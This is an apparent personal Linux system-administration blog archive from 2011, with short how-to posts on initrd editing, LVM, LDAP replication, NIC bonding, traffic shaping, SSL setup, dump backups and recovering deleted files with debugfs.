Friday, August 19, 2011

Editing initrd

Today I was dismayed to find that installing Windows XP had wiped the Fedora 9 boot loader from my laptop. But I recovered my GRUB, because I had previously taken a backup of the MBR using the following command.


dd if=/dev/sda of=/root/mbr bs=446 count=1

I recovered my GRUB by writing /root/mbr back onto /dev/sda:

dd if=/root/mbr of=/dev/sda

But then the real pain started: my system was unable to mount root, because it searched for the UUID specified in initrd-2.6.27.7.img. So I decided to edit my initrd.

For that, I first uncompressed the gzipped image and extracted the cpio archive inside it:

cd /root/vk

gunzip -c /boot/initrd-2.6.27.7.img | cpio -idmv

After that I had the contents of the initrd in the /root/vk folder.

Then I edited the /root/vk/init file and re-created the cpio-archived initrd:

cd /root/vk

find . | cpio --create --format 'newc' > /tmp/vkinit

gzip /tmp/vkinit

cp /tmp/vkinit.gz /boot/

(gzip renames the file to /tmp/vkinit.gz; make sure the name you copy into /boot matches the initrd line in grub.conf.)

Now I am able to mount my root filesystem.



Using usbmon

Using usbmon to monitor usb traffic


The steps for using usbmon are as follows.

1. Prepare

Mount debugfs (it has to be enabled in your kernel configuration), and

load the usbmon module (if built as module). The second step is skipped

if usbmon is built into the kernel.

# mount -t debugfs none_debugs /sys/kernel/debug

# modprobe usbmon

#
Verify that bus sockets are present.

# ls /sys/kernel/debug/usbmon

0s 0u 1s 1t 1u 2s 2t 2u 3s 3t 3u 4s 4t 4u

#

Now you can choose to either use the socket '0u' (to capture packets on all

buses), and skip to step #3, or find the bus used by your device with step #2.

This allows you to filter away annoying devices that talk continuously.

2. Find which bus connects to the desired device

Run "cat /proc/bus/usb/devices", and find the T-line which corresponds tothe device. Usually you do it by looking for the vendor string. If you have

many similar devices, unplug one and compare two /proc/bus/usb/devices outputs.

The T-line will have a bus number. Example:

T: Bus=03 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=12 MxCh= 0

D: Ver= 1.10 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1

P: Vendor=0557 ProdID=2004 Rev= 1.00

S: Manufacturer=ATEN

S: Product=UC100KM V2.00

Bus=03 means it's bus 3.

3. Start 'cat'

# cat /sys/kernel/debug/usbmon/3u > /tmp/1.mon.out

to listen on a single bus, otherwise, to listen on all buses, type:

# cat /sys/kernel/debug/usbmon/0u > /tmp/1.mon.out

This process will be reading until killed. Naturally, the output can be

redirected to a desirable location. This is preferred, because it is going

to be quite long.
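If you only want a short capture, you can bound the session instead of killing cat by hand; a minimal sketch, assuming your device is on bus 3 and that coreutils' timeout is available:

# capture bus 3 for ten seconds, then peek at the first events
timeout 10 cat /sys/kernel/debug/usbmon/3u > /tmp/1.mon.out
head -5 /tmp/1.mon.out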

Use BackTrack for hacking

Dear friends


If you are really interested in hacking, use BackTrack. It's an operating system that provides lots of tools for different kinds of hacking. For more information you can visit the following site.


Use BackTrack 4; download it using the following link: http://www.remote-exploit.org/backtrack.html

udev is a Device manager

udev is a generic kernel device manager. It runs as a daemon on a


Linux system and listens to uevents the kernel sends out (via netlink

socket) if a new device is initialized or a device is removed from the

system. The system provides a set of rules that match against exported

values of the event and properties of the discovered device. A

matching rule will possibly name and create a device node and run

configured programs to set up and configure the device.
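As a concrete illustration, here is a minimal rule-file sketch; the vendor/product IDs, symlink name and script path are all hypothetical:

# /etc/udev/rules.d/99-backupdisk.rules (hypothetical example)
# when a block device from this vendor/product appears, create the
# symlink /dev/backupdisk and run a notification script
SUBSYSTEM=="block", ATTRS{idVendor}=="0557", ATTRS{idProduct}=="2004", SYMLINK+="backupdisk", RUN+="/usr/local/bin/notify-plug.sh"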

Different network interface for different program

For example, let's say you're a student living on-campus; the university provides you with broadband Internet access via Wi-Fi, which is great, except for the fact that you cannot trust it (yes, even when you're careful to use HTTPS and so on, I'll cover that in subsequent blog posts). A general solution to that problem would be getting your very own private Internet access, but being a student, you would prefer not to waste too much money into it, so you'll most likely take the cheapest subscription. So now you have two routes to the Internet: a fast but insecure one, and another that is private but slow. How to use both on the same computer? As bandwidth-intensive applications are often also the ones that don't really require privacy, one could imagine categorizing programs in a way so as to watch Internet TV over the Wi-Fi network while corresponding over the cable.


Here's how to do it with Linux, assuming that the default route is your private connection and that your Wi-Fi interface is named ath0, has IP address 10.1.2.3 and gateway 10.0.0.1:

Create a "wifi" user

adduser wifi

Mark packets coming from the wifi user

iptables -t mangle -A OUTPUT -m owner --uid-owner wifi -j MARK --set-mark 42

Apply the Wi-Fi IP address on them

iptables -t nat -A POSTROUTING -o ath0 -m mark --mark 42 -j SNAT --to-source 10.1.2.3

Route marked packets via Wi-Fi

ip rule add fwmark 42 table 42

ip route add default via 10.0.0.1 dev ath0 table 42

Launch programs as the wifi user

sudo -u wifi vlc

Step 1 is of course required only once; steps 2, 3 and 4 are better put together in a shell script. Regarding step 5, it is much more practical to edit your KDE menu entries for example and there specify that the program has to be run as the wifi user.
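A minimal sketch of such a script, using the interface name, addresses and mark value assumed above:

#!/bin/sh
# wifi-route.sh -- steps 2, 3 and 4 in one place
IF=ath0          # Wi-Fi interface
ADDR=10.1.2.3    # its IP address
GW=10.0.0.1      # its gateway
MARK=42          # arbitrary packet mark

# mark packets coming from the wifi user
iptables -t mangle -A OUTPUT -m owner --uid-owner wifi -j MARK --set-mark $MARK
# rewrite their source address to the Wi-Fi one
iptables -t nat -A POSTROUTING -o $IF -m mark --mark $MARK -j SNAT --to-source $ADDR
# route marked packets via the Wi-Fi gateway
ip rule add fwmark $MARK table $MARK
ip route add default via $GW dev $IF table $MARK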

Linux as QOS Machine

The tc command allows administrators to build different QoS policies in their networks using Linux instead of very expensive dedicated QoS machines. Using Linux, you can implement QoS in all the ways any dedicated QoS machine can and even more. Also, one can make a bridge using a good PC running Linux that can be transformed into a very powerful and very cheap dedicated QoS machine.


Queueing determines the way data is sent; controlling data upload and download by setting certain criteria is possible in Linux. Note that TCP has a flow-control feature, while UDP does not.

Queueing disciplines can be categorized as classless and classful.

Classless disciplines are the simplest; they can be used to delay, reschedule, drop and accept data, and they can shape an entire interface. There are several qdisc implementations in Linux, such as FIFO (pfifo and bfifo), pfifo_fast, tbf, sfq and esfq. By default, pfifo_fast is used in Linux.
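For example, a single classless tbf qdisc is enough to cap a whole interface; a minimal sketch (the interface name and rate are placeholders):

# shape all egress traffic on eth0 down to 1 mbit/s
tc qdisc add dev eth0 root tbf rate 1mbit burst 10kb latency 70ms
# and to remove the shaping again
tc qdisc del dev eth0 root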

Why do top and ps show different priorities?

There is some discrepancy in ps output caused by the fact that each system may use different values to represent the process priority and that the values have changed with the introduction of RT priorities.


The kernel stores the priority value in /proc/<pid>/stat (let's call it p->prio), and ps reads the value and displays it in various ways to the user:

$ ps -A -o pri,opri,intpri,priority,pri_foo,pri_bar,pri_baz,pri_api,pid,comm
PRI PRI PRI  PRI  FOO BAR BAZ API PID COMMAND
 19  80  80   20    0  21 120 -21   1 init
 24  75  75   15   -5  16 115 -16   2 kthreadd
139 -40 -40 -100 -120 -99   0  99   3 migration/0
 24  75  75   15   -5  16 115 -16   4 ksoftirqd/0
139 -40 -40 -100 -120 -99   0  99   5 watchdog/0
139 -40 -40 -100 -120 -99   0  99   6 migration/1
 24  75  75   15   -5  16 115 -16   7 ksoftirqd/1
139 -40 -40 -100 -120 -99   0  99   8 watchdog/1
 24  75  75   15   -5  16 115 -16   9 events/0

Yes, there are 8 undocumented values for the process priority that can be passed to -o option:

Option     Computed as

priority   p->prio
intpri     60 + p->prio
opri       60 + p->prio
pri_foo    p->prio - 20
pri_bar    p->prio + 1
pri_baz    p->prio + 100
pri        39 - p->prio
pri_api    -1 - p->prio

They were introduced to fit the values into certain intervals and for compatibility with POSIX and other systems.
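You can verify the arithmetic yourself: the stored value (p->prio) is field 18 of /proc/<pid>/stat. A small sketch using PID 1:

# the kernel's stored priority for init
awk '{print $18}' /proc/1/stat
# the same value shown three different ways by ps
ps -o pri,opri,priority -p 1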

qemu vs kvm

The QEMU package provides a processor and system emulator which enables users to launch guest virtual machines not only under the same hardware platform as the host machine, but also on dramatically different hardware platforms. For example, QEMU can be used to run a PPC guest on an x86 host. QEMU dynamically translates the machine code of the guest architecture into the machine code of the host architecture.


QEMU does full hardware virtualization; in other words, it would allow you to run a MIPS guest OS inside an x86 host. This is useful, but slower than the alternatives...

KVM is a hypervisor that leverages QEMU for device emulation. I believe (going from memory) this device emulation is basically limited to VGA, disk controllers, etc.
So unless you have a compelling reason (guest platform different from the host), it is best to use KVM and QEMU together.
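The difference shows up directly on the command line; a sketch with hypothetical image names:

# same architecture as the host: hardware-assisted virtualization via KVM
qemu-system-x86_64 -enable-kvm -m 1024 -hda guest-x86.img
# foreign architecture: pure dynamic translation, KVM cannot help here
qemu-system-ppc -m 256 -hda guest-ppc.img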

Using dump

As we know, if you are using dump as a backup system, then a modified Tower of Hanoi sequence of dump levels is suitable. But why?


The idea is to make the level numbers rise and fall so as to minimise the number of backups needed to do a full restore. Write yourself some sequences and figure out which ones you would need for a full restore. Try to figure out, for each backup, whether the same files will be dumped by a later backup; they will, if a later backup's level is lower. The algorithm you are aiming for is:

Start with a level 0 and ignore everything before it.

From the end of the list, find the lowest number before you reach the starting dump. You'll need this backup. Make it the new start of the list.

Repeat the previous step until you reach the level 0 dump.

E.g. given 0 3 2 5 4 7 6 9, to restore everything you need the 0, 2, 4, 6 and 9, i.e. every second dump. You'll see that wherever you stop in that sequence, only every second dump is required to recover everything.

Nice. Using the algorithm above I get the following:

Sequence           Dumps needed

0 3                0 3

0 3 2              0 2

0 3 2 5            0 2 5

0 3 2 5 4          0 2 4

0 3 2 5 4 7        0 2 4 7

0 3 2 5 4 7 6      0 2 4 6

0 3 2 5 4 7 6 9    0 2 4 6 9

Every time a dump of level N is, eh, taken, earlier tapes of level N become obsolete and are free to go. In this case, that happens every other time.
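The restore-set rule above is easy to script; here is a minimal sketch that scans the level sequence from the end, keeping each level that is lower than everything kept so far, until it reaches the level 0:

#!/bin/sh
# needed-dumps.sh -- which dumps are needed for a full restore?
# usage: ./needed-dumps.sh 0 3 2 5 4 7 6 9
min=99
needed=""
for lvl in $(echo "$@" | tr ' ' '\n' | tac); do
    if [ "$lvl" -lt "$min" ]; then
        needed="$lvl $needed"
        min=$lvl
    fi
    [ "$lvl" -eq 0 ] && break
done
echo "dumps needed for full restore: $needed"

Run on the sequence above, it prints 0 2 4 6 9, matching the last row of the table.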

lvm vs RAID1

So, what is the better approach: using LVM's mirroring capabilities, or putting LVM on an mdadm RAID 1?


LVM requires an extra log partition for mirroring. Although that log partition doesn't require much space, it is still an extra pain.

LVM on mdadm RAID1 is more stable than LVM's own mirroring at the moment.

You don't need to partition the disk and create a new PV just for the LVM mirror log. You can use "--alloc anywhere" while creating the mirror volume, and LVM will gladly allocate the mirror log on one of your mirror legs.
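A minimal sketch of that LVM-mirror approach (volume group and LV names are hypothetical):

# mirrored LV; --alloc anywhere lets the mirror log land on a mirror leg
lvcreate -m 1 -L 10G --alloc anywhere -n mirrorlv vg0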

What Is A Snapshot in lvm?

A snapshot is an operation in which we "freeze" the data on a logical volume, while still enabling writing new data.


This, of course, is an oxymoron.

It is solved by splitting the data to old (written before taking the snapshot) and new (written after taking the snapshot).

The old data resides on the original logical volume.

The new data is written to a different disk.

When an application reads from the device, the underlying kernel code finds where the fresh copy of the data lies, and returns that to the application.

Meanwhile, we may mount the original (frozen) content on a different directory, and access it in read-only mode.

E.g. to backup the data.
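A minimal backup-via-snapshot sketch (VG, LV and paths are hypothetical):

# freeze a point-in-time view of datalv, with 1GB of room for changed blocks
lvcreate -s -L 1G -n datasnap /dev/vg0/datalv
mount -o ro /dev/vg0/datasnap /mnt/snap
tar czf /backup/data.tar.gz -C /mnt/snap .
umount /mnt/snap
lvremove -f /dev/vg0/datasnap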

Clustering in Linux

When more than one computer works together to perform a task, it is known as clustering.


There are four types of cluster:

• Storage

• High availability

• Load balancing

• High performance

The types given above are based on the objective of the clustering.

Storage clusters provide a consistent file system image across servers in a cluster, allowing the

servers to simultaneously read and write to a single shared file system. A storage cluster

simplifies storage administration by limiting the installation and patching of applications to one

file system. Red Hat Cluster Suite provides storage clustering through Red Hat GFS.

High-availability clusters provide continuous availability of services by eliminating single points

of failure and by failing over services from one cluster node to another in case a node becomes

inoperative. Red Hat Cluster Suite provides high-availability clustering through its High-availability Service Management component.

Load-balancing clusters dispatch network service requests to multiple cluster nodes to balance

the request load among the cluster nodes. Node failures in a load-balancing cluster are not

visible from clients outside the cluster. Red Hat Cluster Suite provides load-balancing through

LVS (Linux Virtual Server).

High-performance clusters use cluster nodes to perform concurrent calculations. A

high-performance cluster allows applications to work in parallel, therefore enhancing the

performance of the applications. (High performance clusters are also referred to as

computational clusters or grid computing.)

User wise bandwidth control

Suppose you want to limit the download speed of a user 'test' to 1 mbit/s. Linux provides the iptables and tc commands to help in this scenario; the HTB algorithm can be applied on a network interface to control this.


Mark packets originated by user test with mark 6:

iptables -t mangle -A OUTPUT -p tcp -m owner --uid-owner test -j MARK --set-mark 6

The following script can help in this situation:

TC=/sbin/tc

IF=eth0

DNLD=1mbit

start() {

$TC qdisc add dev $IF root handle 1: htb default 30

$TC class add dev $IF parent 1: classid 1:1 htb rate $DNLD

$TC filter add dev $IF protocol ip parent 1:0 prio 1 handle 6 fw flowid 1:1

}

stop() {

$TC qdisc del dev $IF root

}

restart() {

stop

sleep 1

start

}

show() {

$TC -s qdisc ls dev $IF

}

case "$1" in

start)

echo -n "Starting bandwidth shaping: "

start

echo "done"

;;

stop)

echo -n "Stopping bandwidth shaping: "

stop

echo "done"

;;

restart)

echo -n "Restarting bandwidth shaping: "

restart

echo "done"

;;

show)

echo "Bandwidth shaping status for $IF:"

show

echo ""

;;

*)

pwd=$(pwd)

echo "Usage: tc.bash {start
stop
restart
show}"

;;

esac

exit 0

/etc/resolv.conf directives

There are five main configuration directives that one can use in /etc/resolv.conf:


domain (Domain name of host, also set using hostname command)

search (which domain to search)

nameserver (dns server ip)

sortlist ( to specify subnet ) and

options (specify timeout,retry etc options)

--------------------------------------------

A sample /etc/resolv.conf entry:

-------------------

domain test.edu

nameserver 0.0.0.0

nameserver 10.11.0.200

nameserver 10.11.0.101

options timeout:2

samba : NTFS full control can be applied on a file, why not on directories?

With Samba 3.3.x, we moved to using the returned Windows permissions (as mapped from POSIX ACLs) to control all file access. This gets us closer to Windows behavior, but there's one catch: "Full Control" includes the ability to delete a file, but in POSIX the ability to delete a file belongs to the containing directory, not the file itself.


So when we return the Windows permissions for a file ACL with "rwx" set, by default we'd like to map to "Full Control" (see the default setting of the parameter 'acl map full control'), but we must remove the DELETE_ACCESS flag from the mapping, as that is not a permission that is granted. Thus the ACL editor doesn't see "DELETE_ACCESS" in the returned ACE entry, and so doesn't believe it's "Full Control".

If we don't remove the DELETE_ACCESS bit, the client will open a file for delete and successfully get a file handle back, but the delete will fail when the set-file-info (delete this file) call is made. Windows clients only check the error return on the open-for-delete call, not the actual set-file-info call that performs the delete; if you fail that call, Windows Explorer silently ignores the error, tells you you have deleted the file, but the file is still there and will reappear on the next directory refresh, thus confusing users.

Implementing cluster

For the last few days I had been searching for a way to implement a cluster on my single laptop. The idea was to become more familiar with clustering. The linuxquestions.org guys helped me in this direction, and I decided to use VMware Server 2.1 to implement clustering among guest nodes. My laptop has Ubuntu 9.1 installed, and I installed RHEL 5.1 as a guest using VMware Server. Going through docs on clustering using VMware, I concluded that I had to add a virtual SCSI disk with a different bus allocation to my virtual guests. My major concern early on was how to implement a disk that could be shared among guests. I added scsi1, then changed some configuration in the guest .vmx file, as shown below.


The following modifications were made in the .vmx file:

disk.locking = false

scsi1.present = true

scsi1.sharedbus = true

scsi1.virtualdev= "lsilogic"

scsi1:0.present = true

scsi1:0.filename = "d:virtualshareddisk"

scsi1:0.mode = "independent-persistent"

scsi1:0.devicetype = "disk"

After that I restarted my guest. I jumped for joy when I found that the 'fdisk -l' command listed my new disk.

So now I had a disk that could be shared among my individual guests.

Since I had already decided to use OCFS2 as the cluster file system, I installed ocfs2-'uname -r' and ocfs2-tools. For managing it graphically I also installed ocfs2console (remember to replace 'uname -r' with your kernel version).

After installation, I noticed that two new script files had been created inside /etc/init.d: o2cb and ocfs2. Now it was time to configure ocfs2, so I executed the script:

root#cd /etc/init.d

root# ./o2cb configure

The above command generated an error that cluster.conf was not found, so I created /etc/ocfs2/cluster.conf with the following details:

cluster:
        node_count = 2
        name = ocfs2

node:
        ip_port = 7777
        ip_address = 192.168.11.90
        number = 1
        name = node1
        cluster = ocfs2

node:
        ip_port = 7777
        ip_address = 192.168.11.100
        number = 2
        name = node2
        cluster = ocfs2

Now execute:

root# cd /etc/init.d

root# ./o2cb configure

This time it completed successfully.

After that, create a new partition on /dev/sdb and then execute:

root# mkfs.ocfs2 -b 4k -C 32k -N4 -L shareddata /dev/sdb1 --fs-feature-level=max-compat

A clustered file system has now been created on /dev/sdb1; mount it on the guests:

#mount -t ocfs2 /dev/sdb1 /mnt/shared

Great, it all worked.

what is KVM ?

On September 2, 2009, Red Hat announced the availability of the fourth update to its Red Hat Enterprise Linux 5 platform. With this update Red Hat offers a new sort of virtualization known as KVM.


So now you don't have to bother about new commands to test the performance of a guest machine. KVM makes possible uniform support for the complete Linux environment: no different treatment for host and guest.

In December 2006, Linus Torvalds announced that new versions of the Linux kernel would include the virtualization tool known as KVM (Kernel-based Virtual Machine).

KVM merges the hypervisor with the kernel, thus reducing redundancy and speeding up execution. A KVM driver communicates with the kernel and acts as an interface for userspace virtual machines. Memory management and process scheduling are done by the kernel itself.
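To check whether a given machine can actually use KVM, something like the following is enough (a sketch):

# the CPU must advertise hardware virtualization (vmx = Intel, svm = AMD)
egrep -c '(vmx|svm)' /proc/cpuinfo
# the module and the device node should be present
lsmod | grep kvm
ls -l /dev/kvm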

Multi-Level Security in SELINUX

Having information of different security levels on the same computer system poses a real threat. It is not a straightforward matter to isolate different information security levels, even though different users log in using different accounts, with different permissions and different access controls.


One solution is to purchase dedicated systems for each security level, but this is very expensive. Another, inexpensive solution is to use the MLS feature of SELinux.

The term multi-level arises from the defense community's security classifications: Confidential, Secret, and Top Secret.

The Bell-La Padula (BLP) model is used in SELinux to protect multi-level data.

Under such a system, users, computers, and networks use labels to indicate security levels. Data can flow between like levels, for example between "Secret" and "Secret", or from a lower level to a higher level. This means that users at level "Secret" can share data with one another, and can also retrieve information from Confidential-level (i.e., lower-level), users. However, data cannot flow from a higher level to a lower level. This prevents processes at the "Secret" level from viewing information classified as "Top Secret". It also prevents processes at a higher level from accidentally writing information to a lower level. This is referred to as the "no read up, no write down" model.

Linux From Scratch

If you are thinking about creating your own Linux distro, linuxfromscratch is the right platform to start from. The documentation available on http://www.linuxfromscratch.org/ is very helpful in creating a custom distro. But there are also some points you should consider before starting a new distro. Remember:


"Understand what reason to develop new distro"

Openldap Replication

The replication method has changed in OpenLDAP. After struggling a little, I managed to set up replication between two LDAP servers in a master/slave (provider/consumer) fashion.

This is how I achieved LDAP replication on RHEL 5.2 with slapd version 2.3.43:

===Provider ldap server =====

database bdb

suffix "dc=abc,dc=del"

rootdn "uid=root,ou=People,dc=abc,dc=del"

rootpw {SSHA}ifvOmrnBD6xEbsgTbY7n/EikFnKTbbhm

directory /var/lib/ldap/abc.del

index objectClass,entryCSN,entryUUID eq

index uidNumber,gidNumber,loginShell eq,pres

#replication

overlay syncprov

syncprov-checkpoint 1 5

syncprov-sessionlog 100

#monitoring ldap

database monitor

access to *

by dn.exact="uid=root,ou=People,dc=abc,dc=del" read

===Consumer LDAP Server =====

database bdb

suffix "dc=abp,dc=del"

directory /var/lib/ldap/abc.del

rootdn uid=root,ou=People,dc=abc,dc=del

syncrepl rid=000

provider=ldap://10.11.0.105

type=refreshOnly

interval=00:00:20:00

retry="60 +"

searchbase="dc=abc,dc=del"

attrs="*,+"

bindmethod=simple

binddn="uid=root,ou=People,dc=abc,dc=del"

=============================================================

Best Practices deploying LVM

1. Use multiple volume groups to define classes of storage.


2. Use full disk physical volumes over partitions.

3. I like unique naming of volume groups, just so that if

a drive lands elsewhere and presents itself to the system,

it will not collide with existing volume group names.

(But there is a good reason for not doing this... it is really

only a factor if you have a tendency to throw drives into

different computers all the time.)

How to set the maximum segment size for a TCP connection ?

Using iptables we can do this:


root# iptables -I FORWARD -o eth2 -p tcp --syn -j TCPMSS --set-mss 1440

This sets the maximum segment size of forwarded TCP connections to 1440 bytes.

You can test using

root# tshark -n -i eth2 tcp port 80

Accidentally removed an LVM volume, can I restore it?

The following command can be helpful in this scenario:

vgcfgrestore

Also look in /etc/lvm/archive/ for all the archived metadata.

You should be able to use the '--list' option.
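A minimal sketch (the volume group name and archive file are hypothetical):

# see which archived copies of the metadata exist
vgcfgrestore --list vg0
# restore one of them (the file name comes from the --list output)
vgcfgrestore -f /etc/lvm/archive/vg0_00042-1234567890.vg vg0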

Which overlays are present in my openldap server?

Use the monitor backend and then search with the following command:


ldapsearch -b cn=overlays,cn=monitor -s sub monitoredInfo

Setting up monitor backend is also not a big deal

Enter the following entries in /etc/openldap/slapd.conf:

=================

database monitor

access to *

by dn.exact="cn=Manager,dc=example,dc=com" read

by * none

=====================

Move LVM Volume Group to another computer

To move a volume group from one system to another, perform the following steps:


Make sure that no users are accessing files on the active volumes in the volume group, then unmount the logical volumes.

Use the -a n argument of the vgchange command to mark the volume group as inactive, which prevents any further activity on the volume group.

Use the vgexport command to export the volume group. This prevents it from being accessed by the system from which you are removing it.

After you export the volume group, the physical volume will show up as being in an exported volume group when you execute the pvscan command.

When the disks are plugged into the new system, use the vgimport command to import the volume group, making it accessible to the new system.

Activate the volume group with the -a y argument of the vgchange command.

Mount the file system to make it available for use.
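The steps above map onto the following commands; a sketch with hypothetical names:

# on the old system
umount /mnt/data
vgchange -a n myvg
vgexport myvg
# move the disks, then on the new system
pvscan
vgimport myvg
vgchange -a y myvg
mount /dev/myvg/datalv /mnt/data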

Team multiple network interface into single interface

Linux allows binding multiple network interfaces into a single channel/NIC using special kernel module called bonding.


After trying for a few hours I succeeded in implementing bonding on RHEL 5.2. The steps that implement bonding are given below.

Step #1: Create a bond0 configuration file

First, create bond0 config file in /etc/sysconfig/network-scripts/

# vi /etc/sysconfig/network-scripts/ifcfg-bond0

Append the following lines to it:

DEVICE=bond0

IPADDR=192.168.1.20

NETWORK=192.168.1.0

NETMASK=255.255.255.0

USERCTL=no

BOOTPROTO=none

ONBOOT=yes

Step #2: Modify eth0 and eth1 config files:

Open both configuration files using the vi text editor and make sure the file reads as follows for the eth0 interface:

# vi /etc/sysconfig/network-scripts/ifcfg-eth0

Modify/append directives as follows:

DEVICE=eth0

USERCTL=no

ONBOOT=yes

MASTER=bond0

SLAVE=yes

BOOTPROTO=none

And do same for /etc/sysconfig/network-scripts/ifcfg-eth1

Step # 3: Load bond driver/module

Make sure the bonding module is loaded when the channel-bonding interface (bond0) is brought up. One needs to modify the kernel modules configuration file:

# vi /etc/modprobe.conf

Append the following two lines:

alias bond0 bonding

options bond0 mode=balance-alb miimon=100

Save file and exit to shell prompt.

Step # 4: Test configuration

First, load the bonding module:

# modprobe bonding

Restart the networking service in order to bring up the bond0 interface:

# service network restart

Verify everything is working:

# less /proc/net/bonding/bond0

Output:

Bonding Mode: load balancing (round-robin)

MII Status: up

MII Polling Interval (ms): 0

Up Delay (ms): 0

Down Delay (ms): 0

Slave Interface: eth0

MII Status: up

Link Failure Count: 0

Permanent HW addr: 00:0c:29:c6:be:59

Slave Interface: eth1

MII Status: up

Link Failure Count: 0

Permanent HW addr: 00:0c:29:c6:be:63

List all interfaces:

# ifconfig

I want a separate 'document root' in Apache.

To set a separate document root in httpd, we need to make certain changes in httpd.conf. Add the following lines to httpd.conf:


Alias /personal/vishesh /var/personal_work_area/vishesh

<Directory /var/personal_work_area/vishesh>

DirectoryIndex index.php

AllowOverride All

</Directory>

After that, create a .htaccess file inside /var/personal_work_area/vishesh and put the following entries in it:

Options +FollowSymLinks

RewriteEngine On

RewriteBase /personal/vishesh/test

RewriteRule ^alice.html$ bob.html

alice.html and bob.html are HTML files; a request for alice.html is rewritten to serve bob.html.

Using SSL Certificate in your web site

1) Generate a key:


$ openssl genrsa -out www.example.com-key 2048

Generating RSA private key, 2048 bit long modulus

2) Generate a Certificate Sigining Request (CSR):

$ openssl req -new -key www.example.com-key -out www.example.com-csr

You are about to be asked to enter information that will be

incorporated

into your certificate request.

What you are about to enter is what is called a Distinguished

Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [GB]:

State or Province Name (full name) [Berkshire]:Greater London

Locality Name (eg, city) [Newbury]:London

Organization Name (eg, company) [My Company Ltd]:Acme Websites Ltd.

Organizational Unit Name (eg, section) []:

Common Name (eg, your name or your server's hostname) []:www.example.com

Email Address []:

Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:

3) Buy a certificate:

You can buy a certificate from VeriSign, Thawte or a similar CA. What you need to do is go to the website of one of these Certificate Authorities and submit your CSR file.

4) Set up an SSL vhost:

<VirtualHost *:443>

ServerName "www.example.com"

SSLEngine on

SSLCertificateFile "/etc/httpd/conf/ssl/www.example.com-cert"

SSLCertificateKeyFile "/etc/httpd/conf/ssl/www.example.com-key"

...

</VirtualHost>

Complete system backup using dump

Today I installed a new Linux server, and after setting up my server I took a system backup onto my DAT drive by writing a shell script in the following way:


root#vi sysbackup.sh

mt -f /dev/st0 rewind

dump -0uf /dev/nst0 /

dump -0uf /dev/nst0 /boot

dump -0uf /dev/nst0 /home

dump -0uf /dev/nst0 /opt

dump -0uf /dev/nst0 /tmp

dump -0uf /dev/nst0 /usr

dump -0uf /dev/nst0 /var

echo "Backup Completed!"
:wq

root#

Executing my script resulted in a complete file system backup on tape.

Must configure ldap.conf

I set up an LDAP server for authenticating Linux clients. My setup was OK, and clients were authenticating against the server properly. Today, for some reason, my LDAP server went down and I tried to log on to Linux using a local account. The clients took a very long time to reach the login screen, and I got fed up with that, so I edited my /etc/nsswitch.conf file in single-user mode and removed ldap from the passwd and group sections. But then I concluded that this happened because my LDAP client configuration was not proper. I edited my /etc/ldap.conf and entered the following entries in it:


base dc=abc,dc=del

uri ldaps://s1.abc.del ldaps://s2.abc.del

ldap_version 3

timelimit 10

bind_timelimit 10

nss_initgroups_ignoreusers root,ldap,named,avahi,haldaemon,dbus,radvd,tomcat,radiusd,news,mailman

ssl yes

pam_password md5

nss_base_passwd ou=People,dc=abc,dc=del

nss_base_group dc=abc,dc=del

use_sasl off

tls_checkpeer yes

TLS_CACERTFILE /etc/pki/tls/certs/ca-bundle.crt

bind_policy hard_open

idle_timelimit 3550

Now everything is fine.

How are du and df different ?

df and du measure two different things....


du reports the space used by files and folders, even when this is more than the file size. A few quick experiments on my system show that 4K is the minimum file size in terms of disk space.

df reports the space used by the file system. This includes the overhead for journals and inode tables and such.

Finding deleted inodes.

Today I found that some files were missing from my server, so I tried debugfs:

# debugfs /dev/hda2

debugfs: lsdel

OR

echo lsdel | debugfs /dev/hda1 > lsdel.out

debugfs has a stat command which prints details about an inode. Issue the command for each inode in your recovery list. For example, if you're interested in inode number 148003, try this:

debugfs: stat <148003>

If you have a lot of files to recover, you'll want to automate this. Assuming that your lsdel list of inodes to recover is in lsdel.out, try this:

# cut -c1-6 lsdel.out | grep "[0-9]" | tr -d " " > inodes

This new file inodes contains just the numbers of the inodes to recover, one per line. We save it because it will very likely come in handy later on. Then you just say:

# sed 's/^.*$/stat <\0>/' inodes | debugfs /dev/hda1 > stats

and stats contains the output of all the stat commands.

If the file was no more than 12 blocks long, then the block numbers of all its data are stored in the inode: you can read them directly out of the stat output for the inode. Moreover, debugfs has a command which performs this task automatically. To take the example we had before, repeated here:

debugfs: stat <148003>

Inode: 148003 Type: regular Mode: 0644 Flags: 0x0 Version: 1

User: 503 Group: 100 Size: 6065

File ACL: 0 Directory ACL: 0

Links: 0 Blockcount: 12

Fragment: Address: 0 Number: 0 Size: 0

ctime: 0x31a9a574 -- Mon May 27 13:52:04 1996

atime: 0x31a21dd1 -- Tue May 21 20:47:29 1996

mtime: 0x313bf4d7 -- Tue Mar 5 08:01:27 1996

dtime: 0x31a9a574 -- Mon May 27 13:52:04 1996

BLOCKS:

594810 594811 594814 594815 594816 594817

TOTAL: 6

This file has six blocks. Since this is less than the limit of 12, we get debugfs to write the file into a new location, such as /mnt/recovered.000:

debugfs: dump <148003> /mnt/recovered.000

Of course, this can also be done with fsgrab; I'll present it here as an example of using it:

# fsgrab -c 2 -s 594810 /dev/hda1 > /mnt/recovered.000

# fsgrab -c 4 -s 594814 /dev/hda1 >> /mnt/recovered.000

With either debugfs or fsgrab, there will be some garbage at the end of /mnt/recovered.000, but that's fairly unimportant. If you want to get rid of it, the simplest method is to take the Size field from the inode, and plug it into the bs option in a dd command line:

# dd count=1 if=/mnt/recovered.000 of=/mnt/resized.000 bs=6065

Why does ssh sometimes become slow ?

Sometimes you find that ssh takes more than 20 seconds before it asks for a login.


The reason for the slow connections is that SSH is trying to use Kerberos, hangs

for about 10 seconds, then tries public key authentication, hangs for about

10 seconds, and then finally prompts for a password. By setting the "GSSAPIAuthentication" option to false, either in /etc/ssh/ssh_config or on the command line, everything works perfectly.
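A quick way to test this before touching the config file (user@host is a placeholder):

# one-off, from the command line
ssh -o GSSAPIAuthentication=no user@host
# or permanently, in /etc/ssh/ssh_config:
#   Host *
#       GSSAPIAuthentication no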

How to configure multiple vhosts with SSL ?

The problem is that in order to know from which virtual host to serve content a


webserver must inspect the "host" header. This is part of the http

request. However the SSL handshake takes place before any http request

is initiated. In order to complete the handshake the webserver needs

to know which SSL certificate to use. Since the webserver can't yet

know which virtual host's content is being requested, it uses the

certificate of the first host. It's really a limit of the protocol, not the server.

However, a recent addition to the SSL/TLS protocol is SNI, which

